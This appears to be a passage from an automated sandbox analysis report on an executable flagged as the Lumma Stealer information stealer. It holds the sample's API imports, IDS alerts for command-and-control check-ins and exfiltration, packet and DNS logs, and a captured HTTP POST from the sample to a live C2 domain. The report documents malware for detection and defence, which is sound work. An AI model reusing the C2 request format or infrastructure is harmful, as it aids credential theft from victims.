                                                                                                                                      kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                                                                                      user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                                                                                      comctl32.dllInitCommonControls
                                                                                                                                      advapi32.dllAdjustTokenPrivileges
                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                      EnglishUnited States
                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                      2024-12-30T21:29:10.736491+01002058540ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cheapptaxysu .click)1192.168.2.4619471.1.1.153UDP
                                                                                                                                      2024-12-30T21:29:11.331807+01002058541ET MALWARE Observed Win32/Lumma Stealer Related Domain (cheapptaxysu .click in TLS SNI)1192.168.2.449733172.67.177.88443TCP
                                                                                                                                      2024-12-30T21:29:11.331807+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733172.67.177.88443TCP
                                                                                                                                      2024-12-30T21:29:11.495156+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449733172.67.177.88443TCP
                                                                                                                                      2024-12-30T21:29:11.495156+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449733172.67.177.88443TCP
                                                                                                                                      2024-12-30T21:29:11.989226+01002058541ET MALWARE Observed Win32/Lumma Stealer Related Domain (cheapptaxysu .click in TLS SNI)1192.168.2.449734172.67.177.88443TCP
                                                                                                                                      2024-12-30T21:29:11.989226+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734172.67.177.88443TCP
                                                                                                                                      2024-12-30T21:29:12.457406+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449734172.67.177.88443TCP
                                                                                                                                      2024-12-30T21:29:12.457406+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449734172.67.177.88443TCP
                                                                                                                                      2024-12-30T21:29:13.233334+01002058541ET MALWARE Observed Win32/Lumma Stealer Related Domain (cheapptaxysu .click in TLS SNI)1192.168.2.449737172.67.177.88443TCP
                                                                                                                                      2024-12-30T21:29:13.233334+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737172.67.177.88443TCP
                                                                                                                                      2024-12-30T21:29:25.673943+01002058541ET MALWARE Observed Win32/Lumma Stealer Related Domain (cheapptaxysu .click in TLS SNI)1192.168.2.449742172.67.177.88443TCP
                                                                                                                                      2024-12-30T21:29:25.673943+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742172.67.177.88443TCP
                                                                                                                                      2024-12-30T21:29:26.168677+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449742172.67.177.88443TCP
                                                                                                                                      2024-12-30T21:29:27.091080+01002058541ET MALWARE Observed Win32/Lumma Stealer Related Domain (cheapptaxysu .click in TLS SNI)1192.168.2.449743172.67.177.88443TCP
                                                                                                                                      2024-12-30T21:29:27.091080+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743172.67.177.88443TCP
                                                                                                                                      2024-12-30T21:29:29.754507+01002058541ET MALWARE Observed Win32/Lumma Stealer Related Domain (cheapptaxysu .click in TLS SNI)1192.168.2.449744172.67.177.88443TCP
                                                                                                                                      2024-12-30T21:29:29.754507+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744172.67.177.88443TCP
                                                                                                                                      2024-12-30T21:29:31.157538+01002058541ET MALWARE Observed Win32/Lumma Stealer Related Domain (cheapptaxysu .click in TLS SNI)1192.168.2.449745172.67.177.88443TCP
                                                                                                                                      2024-12-30T21:29:31.157538+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745172.67.177.88443TCP
                                                                                                                                      2024-12-30T21:29:33.471503+01002058541ET MALWARE Observed Win32/Lumma Stealer Related Domain (cheapptaxysu .click in TLS SNI)1192.168.2.449746172.67.177.88443TCP
                                                                                                                                      2024-12-30T21:29:33.471503+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449746172.67.177.88443TCP
                                                                                                                                      2024-12-30T21:29:33.992765+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449746172.67.177.88443TCP
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Dec 30, 2024 21:29:10.767904997 CET49733443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:10.767932892 CET44349733172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:10.767997980 CET49733443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:10.770870924 CET49733443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:10.770894051 CET44349733172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:11.331634045 CET44349733172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:11.331806898 CET49733443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:11.334856033 CET49733443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:11.334876060 CET44349733172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:11.335216045 CET44349733172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:11.377749920 CET49733443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:11.384895086 CET49733443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:11.384895086 CET49733443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:11.385387897 CET44349733172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:11.495181084 CET44349733172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:11.495229959 CET44349733172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:11.495338917 CET49733443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:11.495352030 CET44349733172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:11.502118111 CET44349733172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:11.502176046 CET49733443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:11.502182007 CET44349733172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:11.502211094 CET44349733172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:11.502383947 CET49733443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:11.502882957 CET49733443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:11.502892971 CET44349733172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:11.503197908 CET49733443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:11.503202915 CET44349733172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:11.531568050 CET49734443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:11.531605959 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:11.531672001 CET49734443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:11.532022953 CET49734443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:11.532037973 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:11.989156961 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:11.989226103 CET49734443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:11.993660927 CET49734443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:11.993671894 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:11.993902922 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:11.995476007 CET49734443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:11.995513916 CET49734443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:11.996516943 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:12.457401991 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:12.457442999 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:12.457469940 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:12.457499027 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:12.457530975 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:12.457598925 CET49734443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:12.457619905 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:12.457663059 CET49734443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:12.457899094 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:12.458122015 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:12.458167076 CET49734443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:12.458173037 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:12.462152004 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:12.462182999 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:12.462201118 CET49734443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:12.462208986 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:12.462253094 CET49734443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:12.544085979 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:12.544151068 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:12.544187069 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:12.544229031 CET49734443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:12.544244051 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:12.544271946 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:12.544306040 CET49734443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:12.544337034 CET49734443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:12.544471979 CET49734443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:12.544483900 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:12.544493914 CET49734443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:12.544498920 CET44349734172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:12.764971018 CET49737443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:12.765011072 CET44349737172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:12.765125036 CET49737443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:12.765631914 CET49737443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:12.765645981 CET44349737172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:13.233266115 CET44349737172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:13.233334064 CET49737443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:13.234493971 CET49737443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:13.234500885 CET44349737172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:13.234718084 CET44349737172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:13.235696077 CET49737443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:13.235819101 CET49737443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:13.235847950 CET44349737172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:13.236821890 CET49737443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:13.236829996 CET44349737172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:25.054500103 CET44349737172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:25.054586887 CET44349737172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:25.054661989 CET49737443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:25.054922104 CET49737443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:25.054938078 CET44349737172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:25.201844931 CET49742443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:25.201883078 CET44349742172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:25.201994896 CET49742443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:25.202375889 CET49742443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:25.202389956 CET44349742172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:25.673870087 CET44349742172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:25.673943043 CET49742443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:25.676167965 CET49742443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:25.676179886 CET44349742172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:25.676417112 CET44349742172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:25.689651012 CET49742443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:25.689814091 CET49742443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:25.689842939 CET44349742172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:26.168667078 CET44349742172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:26.168771982 CET44349742172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:26.168963909 CET49742443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:26.169107914 CET49742443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:26.169130087 CET44349742172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:26.616434097 CET49743443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:26.616471052 CET44349743172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:26.616604090 CET49743443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:26.616934061 CET49743443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:26.616950035 CET44349743172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:27.091010094 CET44349743172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:27.091079950 CET49743443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:27.098546028 CET49743443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:27.098555088 CET44349743172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:27.098799944 CET44349743172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:27.100564003 CET49743443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:27.100821972 CET49743443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:27.100852013 CET44349743172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:27.100924015 CET49743443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:27.100933075 CET44349743172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:28.947272062 CET44349743172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:28.947412968 CET44349743172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:28.947571993 CET49743443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:28.947642088 CET49743443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:28.947658062 CET44349743172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:29.294193029 CET49744443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:29.294228077 CET44349744172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:29.294317007 CET49744443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:29.294696093 CET49744443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:29.294711113 CET44349744172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:29.754425049 CET44349744172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:29.754507065 CET49744443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:29.774203062 CET49744443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:29.774218082 CET44349744172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:29.774545908 CET44349744172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:29.786139965 CET49744443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:29.786315918 CET49744443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:29.786320925 CET44349744172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:30.233836889 CET44349744172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:30.233942986 CET44349744172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:30.234008074 CET49744443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:30.234127998 CET49744443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:30.234143019 CET44349744172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:30.680083036 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:30.680136919 CET44349745172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:30.680358887 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:30.680744886 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:30.680758953 CET44349745172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:31.157263994 CET44349745172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:31.157537937 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:31.158742905 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:31.158756018 CET44349745172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:31.158958912 CET44349745172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:31.160173893 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:31.160953045 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:31.160985947 CET44349745172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:31.161210060 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:31.161243916 CET44349745172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:31.161379099 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:31.161427975 CET44349745172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:31.161580086 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:31.161611080 CET44349745172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:31.161772013 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:31.161811113 CET44349745172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:31.162097931 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:31.162112951 CET44349745172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:31.162126064 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:31.162138939 CET44349745172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:31.162262917 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:31.162285089 CET44349745172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:31.162307024 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:31.162437916 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:31.162470102 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:31.171351910 CET44349745172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:31.171593904 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:31.171622992 CET44349745172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:31.171649933 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:31.171685934 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:31.171770096 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:31.176222086 CET44349745172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:32.993088007 CET44349745172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:32.993197918 CET44349745172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:32.993360043 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:32.993400097 CET49745443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:32.993417025 CET44349745172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:33.002473116 CET49746443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:33.002512932 CET44349746172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:33.002593994 CET49746443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:33.002938032 CET49746443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:33.002949953 CET44349746172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:33.471332073 CET44349746172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:33.471503019 CET49746443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:33.474924088 CET49746443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:33.474930048 CET44349746172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:33.475131035 CET44349746172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:33.476110935 CET49746443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:33.476131916 CET49746443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:33.476175070 CET44349746172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:33.992764950 CET44349746172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:33.992856979 CET44349746172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:33.992908955 CET49746443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:33.993036985 CET49746443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:33.993053913 CET44349746172.67.177.88192.168.2.4
                                                                                                                                      Dec 30, 2024 21:29:33.993062973 CET49746443192.168.2.4172.67.177.88
                                                                                                                                      Dec 30, 2024 21:29:33.993069887 CET44349746172.67.177.88192.168.2.4
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Dec 30, 2024 21:29:10.736490965 CET6194753192.168.2.41.1.1.1
                                                                                                                                      Dec 30, 2024 21:29:10.762279034 CET53619471.1.1.1192.168.2.4
                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Dec 30, 2024 21:29:10.736490965 CET192.168.2.41.1.1.10x75a1Standard query (0)cheapptaxysu.clickA (IP address)IN (0x0001)false
                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Dec 30, 2024 21:29:10.762279034 CET1.1.1.1192.168.2.40x75a1No error (0)cheapptaxysu.click172.67.177.88A (IP address)IN (0x0001)false
                                                                                                                                      Dec 30, 2024 21:29:10.762279034 CET1.1.1.1192.168.2.40x75a1No error (0)cheapptaxysu.click104.21.67.146A (IP address)IN (0x0001)false
                                                                                                                                      • cheapptaxysu.click
                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.449733172.67.177.884437412C:\Users\user\Desktop\Setup.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 20:29:11 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 8
                                                                                                                                      Host: cheapptaxysu.click
                                                                                                                                      2024-12-30 20:29:11 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                      Data Ascii: act=life
                                                                                                                                      2024-12-30 20:29:11 UTC560INHTTP/1.1 403 Forbidden
                                                                                                                                      Date: Mon, 30 Dec 2024 20:29:11 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O7mdCnRvVYl8IN6BUPlNSXcLV%2FNvReq9rg8R5MyQG2BziQgtO%2Bx%2BEGM%2B2DrkvXM0dRhTKzSzo1KWPPAHzvgxsxZjZxZRdXScE5Zj5ZCsZzQlZF0sBCQSULFoQDXvnl3wZLCUcUM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8fa4c7d278ff0f64-EWR
                                                                                                                                      2024-12-30 20:29:11 UTC809INData Raw: 31 31 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                      Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
